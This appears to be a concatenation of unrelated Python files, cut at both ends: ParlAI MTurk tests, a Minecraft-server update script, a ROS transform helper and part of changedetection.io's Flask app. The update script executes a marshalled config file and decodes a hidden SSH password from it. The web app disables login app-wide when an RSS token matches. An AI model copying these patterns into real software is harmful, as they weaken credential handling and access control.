AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""
Various unit tests for the AssignState class.
"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args()
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(opt=self.opt, mturk_agent_ids=mturk_agent_ids)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
"""
Test proper initialization of assignment states.
"""
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
"""
Test message management in an AssignState.
"""
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
"""
Ensures status updates and is_final are valid.
"""
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""
Various unit tests for the MTurkAgent class.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args()
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(), mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(),
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
"""
Test initialization of an agent.
"""
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
"""
Test the mturk agent wrappers around its state.
"""
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [AssignState.STATUS_DONE, AssignState.STATUS_PARTNER_DISCONNECT]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
"""
Ensure the connection_id hasn't changed.
"""
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id
)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
"""
Ensure data packet generated for inactive commands is valid.
"""
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
"""
Ensure observations and acts work as expected.
"""
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1
)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEqual(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(
disconnect_message['text'], self.turk_agent.MTURK_DISCONNECT_MESSAGE
)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEqual(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
Update_ALL.py
|
from wakeonlan import send_magic_packet
from fabric import Connection
import marshal
import types
import threading
from queue import Queue
import socket
import time
import base64
import sys
import paramiko.ssh_exception
def starting_module(c_q):
print("###########################################")
print("## UPDATE ALL - V3.0 ##")
print("## AUTHOR - MAFIOSI ##")
print("###########################################")
print()
print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING")
time.sleep(2)
print()
print("[STATE] Checking file configs.pyc availability....")
try:
s = open('configs.pyc', 'rb')
print("[RESULT] File configs.pyc found")
print()
except:
print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE")
c_q.put(2)
return
s.seek(12)
olives = marshal.load(s)
garden = types.ModuleType("Garden")
exec(olives,garden.__dict__)
alpha = base64.decodebytes(bytes(garden.pick(1)))
beta = base64.decodebytes(bytes(garden.pick(2)))
gamma = base64.decodebytes(bytes(garden.pick(3)))
delta = base64.decodebytes(bytes(garden.pick(4)))
x = 9
alpha = alpha.decode()
beta = beta.decode()
gamma = gamma.decode()
delta = delta.decode()
# CONNECTION VARIABLES
server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta})
command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &'
# TIME PC TAKES TO TURN ON
zzz = 50
verify = False
##########################################
########## MAIN PROGRAM ##########
##########################################
while True:
print('[STATE] Looking up server info...')
try:
time.sleep(1)
i = socket.gethostbyname(gamma)
time.sleep(1)
print('[RESULT] Server OK')
print()
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server info could not be retrieved, try again later")
c_q.put(3)
return
# TELLS PC TO TURN ON
print('[STATE] Checking if Server is ON...')
try:
send_magic_packet(delta, ip_address=i, port=x)
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(4)
return
# CHECKS IF PC IS ALREADY ON AND CONNECTS
try:
server.run('ls', hide=True)
verify = server.is_connected
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server is turned off --> Turning it ON...")
if not verify:
print("[ACTION] Sending Magic Packets")
print("[ACTION] Waiting for Server to turn ON. ETA: ~60 sec")
print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)")
time.sleep(zzz)
try:
server.run('ls', hide=True)
verify = server.is_connected
if verify:
print("[RESULT] Server is turned ON")
print()
else:
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
else:
print("[RESULT] Server is Turned ON")
print()
# TRY TO TRANSFER FILES TO PC
# MODDED - server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_MODDED.zip', '/opt/Transfer/Vanilla/Distribution')
# VANILLA - server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_VANNILA.zip', '/opt/Transfer/Modded/Distribution')
print("[STATE] Transferring Files")
try:
server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_MODDED.zip', '/opt/Transfer/Vanilla/Distribution')
print("[RESULT] Files Transferred Sucessfully")
print()
c_q.put(1)
break
except:
print("[RESULT] Files could not be transferred")
c_q.put(6)
break
return
##########################################
########## MAIN ROUTINE ##########
##########################################
def main():
sys.tracebacklimit = None
close_queue= Queue()
thread_start_server = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(close_queue,))
thread_start_server.start()
# WAITS FOR THREAD TO GIVE OUTPUT (BAD OR GOOD)
while True:
state = close_queue.get()
if state == 1:
print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM')
time.sleep(8)
return
else:
print("ERROR: " + str(state))
print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)')
time.sleep(8)
return
if __name__ == '__main__':
main()
|
transform_handler.py
|
import threading
import numpy as np
import rospy
import tf2_ros
from geometry_msgs.msg import TransformStamped
from visualization_msgs.msg import Marker
from tf import transformations
class TransformHandler(object):
"""
This class uses a tfBuffer to handle transforms related to the vision kit.
"""
def __init__(self):
self.__tf_buffer = tf2_ros.Buffer()
self.__debug_stop_event = threading.Event()
self.__debug_thread = None
self.__debug_current_ws = None # only for debugging purposes
def __del__(self):
self.disable_debug()
def set_relative_pose_object(self, workspace, x_rel, y_rel, yaw_rel, yaw_center=None):
"""
Updates the transform base_link -> object_base in local tfBuffer
:param workspace: reference workspace object
:param x_rel: object base x position relative to workspace
:param y_rel: object base y position relative to workspace
:param yaw_rel: object base rotation on z relative to workspace
:param yaw_center: Avoid over rotation
"""
position = np.dot(workspace.position_matrix, np.array([x_rel, y_rel, 1]))
camera_rotation = transformations.euler_matrix(0, 0, yaw_rel)
# Here we correct the object orientation to be similar to base_link if
# the object in on the ground. Not neccessarily needed to be honest...
convention_rotation = np.array([[0, -1, 0, 0],
[-1, 0, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]])
object_rotation = transformations.concatenate_matrices(
workspace.rotation_matrix, camera_rotation, convention_rotation)
roll, pitch, yaw = transformations.euler_from_matrix(object_rotation)
# Correcting yaw to avoid out of reach targets
if yaw_center is not None:
if yaw < yaw_center - np.pi / 2:
yaw += np.pi
elif yaw > yaw_center + np.pi / 2:
yaw -= np.pi
q = transformations.quaternion_from_euler(roll, pitch, yaw)
t = TransformStamped()
t.transform.translation.x = position[0]
t.transform.translation.y = position[1]
t.transform.translation.z = position[2]
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
t.header.frame_id = "base_link"
t.child_frame_id = "object_base"
self.__tf_buffer.set_transform(t, "default_authority")
def set_grip(self, grip):
"""
Updates the transform object_base -> tool_link_target in local tfBuffer
:param grip:
"""
if grip.transform.header.frame_id != "object_base":
print "Grip transform need to have header frame 'object_base'"
return False
if grip.transform.child_frame_id != "tool_link_target":
print "Grip transform need to have child frame 'tool_link_target'"
return False
self.__tf_buffer.set_transform(grip.transform, "default_authority")
return True
def get_object_base_transform(self):
"""
Reads the transform base_link -> object_base from local tfBuffer
:returns: transform base_link -> object_base
"""
return self.__tf_buffer.lookup_transform("base_link", "object_base",
rospy.Time(0))
def get_gripping_transform(self):
"""
Reads the transform base_link -> tool_link_target from local tfBuffer
:returns: transform base_link -> tool_link_target
"""
return self.__tf_buffer.lookup_transform(
"base_link", "tool_link_target", rospy.Time(0))
def get_calibration_tip_position(self, robot_pose):
"""
Retrieves the position of the calibration tip from a given robot pose.
:param robot_pose: pose of the robot's tool_link
:returns: xyz position of calibration tip in robot coordinates
"""
# First apply transform for robot pose
base_link_to_tool_link = self.transform_from_euler(
robot_pose.position.x, robot_pose.position.y, robot_pose.position.z,
robot_pose.rpy.roll, robot_pose.rpy.pitch, robot_pose.rpy.yaw,
"base_link", "tool_link"
)
self.__tf_buffer.set_transform(base_link_to_tool_link,
"default_authority")
# Manually apply transform for the calibration tool
tool_link_to_calib_tip = self.transform_from_euler(
0.025, 0, 0, 0, 0, 0, "tool_link", "calibration_tip"
)
self.__tf_buffer.set_transform(tool_link_to_calib_tip,
"default_authority")
base_link_to_calib_tip = self.__tf_buffer.lookup_transform(
"base_link", "calibration_tip", rospy.Time(0))
return base_link_to_calib_tip.transform.translation
def get_grip_transform(self, ws_name, robot_pose):
"""
Retrieves the transform needed to create a grip supposing the object
is placed on the origin of the given workspace.
:param ws_name: name of the workspace the object is placed on
:param robot_pose: pose of the robot's tool_link
"""
# First apply transform for robot pose
base_link_to_tool_link = self.transform_from_euler(
robot_pose.position.x, robot_pose.position.y, robot_pose.position.z,
robot_pose.rpy.roll, robot_pose.rpy.pitch, robot_pose.rpy.yaw,
"base_link", "tool_link"
)
self.__tf_buffer.set_transform(base_link_to_tool_link,
"default_authority")
# Manually place object on origin
self.set_relative_pose_object(ws_name, 0, 0, 0)
# Lookup the grip
t = self.__tf_buffer.lookup_transform("object_base", "tool_link",
rospy.Time(0))
t.child_frame_id = "tool_link_target"
return t
@staticmethod
def transform_from_euler(x, y, z, roll, pitch, yaw, header_frame_id,
child_frame_id):
"""
Creates a new stamped transform from translation and euler-orientation
:param x: x translation
:param y: y translation
:param z: z translation
:param roll: orientation roll
:param pitch: orientation pitch
:param yaw: orientation yaw
:param header_frame_id: transform from this frame
:param child_frame_id: transform to this frame
:returns: transform
"""
t = TransformStamped()
t.transform.translation.x = x
t.transform.translation.y = y
t.transform.translation.z = z
q = transformations.quaternion_from_euler(roll, pitch, yaw)
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
t.header.frame_id = header_frame_id
t.child_frame_id = child_frame_id
return t
def enable_debug(self):
"""
Start publishing debug information on /tf and /visualization_marker for
debugging using rviz. This will happen in a separate thread.
"""
self.__debug_thread = threading.Thread(target=self.__debug_loop)
self.__debug_thread.start()
def disable_debug(self):
"""
Stop publishing debug inforation
"""
self.__debug_stop_event.set()
if self.__debug_thread is not None:
self.__debug_thread.join()
def __debug_loop(self):
"""
Debug loop that will run in a separate thread.
(tfBuffer should be threadsafe)
"""
broadcaster = tf2_ros.TransformBroadcaster()
rviz_marker_pub = rospy.Publisher('/visualization_marker', Marker,
queue_size=1000)
rate = rospy.Rate(5)
while not self.__debug_stop_event.is_set() and not rospy.is_shutdown():
if self.__debug_current_ws is None:
print "Could not publish debug tf, no workspace set."
rate.sleep()
continue
try:
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
"base_link", self.__debug_current_ws.name,
rospy.Time(0))
)
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
self.__debug_current_ws.name, "object_base",
rospy.Time(0))
)
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
"object_base", "tool_link_target", rospy.Time(0))
)
except tf2_ros.LookupException as e:
print "Could not publish debug tf: ", e
for i in range(4): # Iterate over the 4 markers defining the workspace
msg = Marker()
msg.header.frame_id = "base_link"
msg.id = i
msg.type = 2 # It correspond to a sphere which will be drawn
msg.pose.position.x = self.__debug_current_ws.points[i][0]
msg.pose.position.y = self.__debug_current_ws.points[i][1]
msg.pose.position.z = self.__debug_current_ws.points[i][2]
msg.scale.x = 0.005
msg.scale.y = 0.005
msg.scale.z = 0.005
msg.color.r = 1.0 if i == 0 or i == 3 else 0.0
msg.color.g = 1.0 if i == 1 or i == 3 else 0.0
msg.color.b = 1.0 if i == 2 or i == 3 else 0.0
msg.color.a = 1.0
rviz_marker_pub.publish(msg)
rate.sleep()
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import datetime
import os
import queue
import threading
import time
from copy import deepcopy
from threading import Event
import flask_login
import pytz
import timeago
from feedgen.feed import FeedGenerator
from flask import (
Flask,
abort,
flash,
make_response,
redirect,
render_template,
request,
send_from_directory,
url_for,
)
from flask_login import login_required
from flask_wtf import CSRFProtect
from changedetectionio import html_tools
__version__ = '0.39.11'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__,
static_url_path="",
static_folder="static",
template_folder="templates")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
csrf = CSRFProtect()
csrf.init_app(app)
notification_debug_log=[]
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python is by reference
# populate_form in wtfors didnt work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
# When nobody is logged in Flask-Login's current_user is set to an AnonymousUser object.
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
# Compare given password against JSON store or Env var
def check_password(self, password):
import base64
import hashlib
# Can be stored in env (for deployments) or in the general configs
raw_salt_pass = os.getenv("SALTED_PASS", False)
if not raw_salt_pass:
raw_salt_pass = datastore.data['settings']['application']['password']
raw_salt_pass = base64.b64decode(raw_salt_pass)
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password'] and not os.getenv("SALTED_PASS", False):
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
if flask_login.current_user.is_authenticated:
flash("Already logged in")
return redirect(url_for("index"))
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
# For now there's nothing else interesting here other than the index/list page
# It's more reliable and safe to ignore the 'next' redirect
# When we used...
# next = request.args.get('next')
# return redirect(next or url_for('index'))
# We would sometimes get login loop errors on sites hosted in sub-paths
# note for the future:
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password login if there is not one set
# (No password in settings or env var)
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False and os.getenv("SALTED_PASS", False) == False
# Set the auth cookie path if we're running as X-settings/X-Forwarded-Prefix
if os.getenv('USE_X_SETTINGS') and 'X-Forwarded-Prefix' in request.headers:
app.config['REMEMBER_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
app.config['SESSION_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
# @todo use title if it exists
fe.link(link=diff_link)
fe.title(title=watch['url'])
# @todo in the future <description><![CDATA[<html><body>Any code html is valid.</body></html>]]></description>
fe.description(description=watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'],
# Don't link to hosting when we're on the hosting environment
hosted_sticky=os.getenv("SALTED_PASS", False) == False,
guid=datastore.data['app_guid'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
